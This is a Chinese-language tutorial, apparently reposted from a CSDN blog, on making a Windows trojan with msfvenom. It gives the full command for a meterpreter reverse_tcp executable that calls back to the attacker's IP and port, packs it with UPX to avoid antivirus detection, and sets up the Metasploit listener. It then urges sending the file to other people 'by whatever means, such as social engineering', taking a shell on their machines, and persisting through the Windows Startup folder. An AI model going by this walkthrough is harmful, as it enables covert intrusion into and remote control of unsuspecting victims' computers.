之前一篇文章通过以永恒之蓝漏洞为切入点详细的讲解了 Meterpreter 的用法.今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。
Msfvenom
- –p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
- –l:查看所有payload encoder nops。
- –f :输出文件格式。
- –e:编码免杀。
- –a:选择架构平台 x86 | x64 | x86_64
- –o:文件输出
- –s:生成payload的最大长度,就是文件大小。
- –b:避免使用的字符 例如:不使用 ‘\0f’。
- –i:编码次数。
- –c:添加自己的shellcode
- –x | -k:捆绑
查看 msfvenom
生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.226 lport=8888 -f exe -o test.exe
#lhost是我们的主机ip,lport是我们主机的用于监听的端口
然后在 root目录下生成了一个test.exe 文件
利用 upx 加壳
upx -9 test.exe -k -o test2.exe
接下来,我们运行 msfconsole 进入MSF控制台,然后输入以下命令
msf > use exploit/multi/handler #使用exploit/multi/handler监听从肉鸡发来的数据
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #设置payload,不同的木马设置不同的payload
查看配置信息
show options
设置本地接收地址及端口
run开始监听
然后,我们把木马发送给别人(无论你使用什么手段,比如社会工程学)让其在其他主机上运行,我们这边检测到木马被运行了这边就会接收到反弹过来的session。比如下面,木马在靶机上运行,这边马上就接收到了
输入 shell 进入主机
成功进入目标主机
对于这个木马,如果我们在获取到某主机的shell后,想要在目标主机建立持续性的后门,我们可以将该木马放到目标主机的开机启动项中(如何远程加入到启动项中?),那样,只要该主机启动后,我们就可以连接到该主机了
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
但是,虽然目标主机运行了该木马程序,但是由于种种原因,还是有可能获取不到对方的session。
refer to :https://blog.csdn.net/qq_36119192/article/details/83869141